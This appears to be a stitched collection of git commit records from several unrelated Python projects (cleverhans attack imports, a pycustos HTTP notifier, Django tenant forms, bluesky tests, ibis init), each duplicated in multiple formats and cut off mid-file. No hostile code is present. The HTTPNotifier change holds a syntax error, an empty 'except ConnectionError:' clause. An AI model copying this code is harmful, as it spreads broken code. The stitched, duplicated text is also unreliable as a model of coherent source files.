from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
<commit_msg>Allow spsa to be imported from cleverhans.future.torch.attacks<commit_after># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
|
e572dcb08e9c89d11c4702927561ef9c2ebc3cb1 | custos/notify/http.py | custos/notify/http.py | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
| import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, json=True, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:param json: If True, send message as json payload, else use an url query string
:type json: bool
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
self.json = json
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
if self.json is True:
params['timestamp'] = str(params['timestamp'])
params['uuid'] = str(params['uuid'])
ret = requests.post(recipient, json=params, auth=self.auth)
else:
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except ConnectionError:
except:
log.exception('Could not post message')
| Add option to send message as json payload in HTTPNotifier | Add option to send message as json payload in HTTPNotifier
| Python | mit | fact-project/pycustos | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
Add option to send message as json payload in HTTPNotifier | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, json=True, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:param json: If True, send message as json payload, else use an url query string
:type json: bool
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
self.json = json
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
if self.json is True:
params['timestamp'] = str(params['timestamp'])
params['uuid'] = str(params['uuid'])
ret = requests.post(recipient, json=params, auth=self.auth)
else:
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except ConnectionError:
except:
log.exception('Could not post message')
| <commit_before>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
<commit_msg>Add option to send message as json payload in HTTPNotifier<commit_after> | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, json=True, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:param json: If True, send message as json payload, else use an url query string
:type json: bool
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
self.json = json
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
if self.json is True:
params['timestamp'] = str(params['timestamp'])
params['uuid'] = str(params['uuid'])
ret = requests.post(recipient, json=params, auth=self.auth)
else:
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except ConnectionError:
except:
log.exception('Could not post message')
| import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
Add option to send message as json payload in HTTPNotifierimport logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, json=True, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:param json: If True, send message as json payload, else use an url query string
:type json: bool
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
self.json = json
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
if self.json is True:
params['timestamp'] = str(params['timestamp'])
params['uuid'] = str(params['uuid'])
ret = requests.post(recipient, json=params, auth=self.auth)
else:
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except ConnectionError:
except:
log.exception('Could not post message')
| <commit_before>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
<commit_msg>Add option to send message as json payload in HTTPNotifier<commit_after>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, json=True, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:param json: If True, send message as json payload, else use an url query string
:type json: bool
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
self.json = json
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
if self.json is True:
params['timestamp'] = str(params['timestamp'])
params['uuid'] = str(params['uuid'])
ret = requests.post(recipient, json=params, auth=self.auth)
else:
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except ConnectionError:
except:
log.exception('Could not post message')
|
c47c334eb10c331266a2469c0975698722c2cbb4 | towel/mt/forms.py | towel/mt/forms.py | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
| """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| Stop being secretive about it | Stop being secretive about it
| Python | bsd-3-clause | matthiask/towel,matthiask/towel,matthiask/towel,matthiask/towel | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
Stop being secretive about it | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| <commit_before>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
<commit_msg>Stop being secretive about it<commit_after> | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
Stop being secretive about it"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| <commit_before>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
<commit_msg>Stop being secretive about it<commit_after>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
|
70ee0532f68a08fa12ba7bbfb217273ca8ef7a48 | bluesky/tests/test_simulators.py | bluesky/tests/test_simulators.py | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| Test that plan_tools import works but warns. | TST: Test that plan_tools import works but warns.
| Python | bsd-3-clause | ericdill/bluesky,ericdill/bluesky | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
TST: Test that plan_tools import works but warns. | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| <commit_before>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
<commit_msg>TST: Test that plan_tools import works but warns.<commit_after> | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
TST: Test that plan_tools import works but warns.from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| <commit_before>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
<commit_msg>TST: Test that plan_tools import works but warns.<commit_after>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
|
b748de5c965219688562819b3cabad1b7ee357d1 | ibis/__init__.py | ibis/__init__.py | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| Add desc to ibis namespace | Add desc to ibis namespace
| Python | apache-2.0 | mariusvniekerk/ibis,koverholt/ibis,shaunstanislaus/ibis,deepfield/ibis,Supermem/ibis,o0neup/ibis,ibis-project/ibis,ashhher3/ibis,fivejjs/ibis,Supermem/ibis,koverholt/ibis,cloudera/ibis,laserson/ibis,mahantheshhv/ibis,cloudera/ibis,korotkyn/ibis,Winterflower/ibis,ibis-project/ibis,fivejjs/ibis,adamobeng/ibis,dboyliao/ibis,glenioborges/ibis,o0neup/ibis,korotkyn/ibis,fivejjs/ibis,Winterflower/ibis,ibis-project/ibis,ashhher3/ibis,Winterflower/ibis,koverholt/ibis,dboyliao/ibis,o0neup/ibis,glenioborges/ibis,laserson/ibis,mahantheshhv/ibis,koverholt/ibis,ashhher3/ibis,dboyliao/ibis,aslihandincer/ibis,ibis-project/ibis,aslihandincer/ibis,dalejung/ibis,mariusvniekerk/ibis,glenioborges/ibis,cpcloud/ibis,laserson/ibis,deepfield/ibis,adamobeng/ibis,wesm/ibis,cpcloud/ibis,cpcloud/ibis,wesm/ibis,glenioborges/ibis,adamobeng/ibis,cpcloud/ibis,dalejung/ibis,mahantheshhv/ibis,adamobeng/ibis,cloudera/ibis,mariusvniekerk/ibis,ashhher3/ibis,aslihandincer/ibis,mahantheshhv/ibis,aslihandincer/ibis,Supermem/ibis,dalejung/ibis,Supermem/ibis,shaunstanislaus/ibis,deepfield/ibis,shaunstanislaus/ibis,dboyliao/ibis,laserson/ibis,korotkyn/ibis,wesm/ibis,korotkyn/ibis,mariusvniekerk/ibis,deepfield/ibis | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
Add desc to ibis namespace | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| <commit_before># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
<commit_msg>Add desc to ibis namespace<commit_after> | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
Add desc to ibis namespace# Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| <commit_before># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
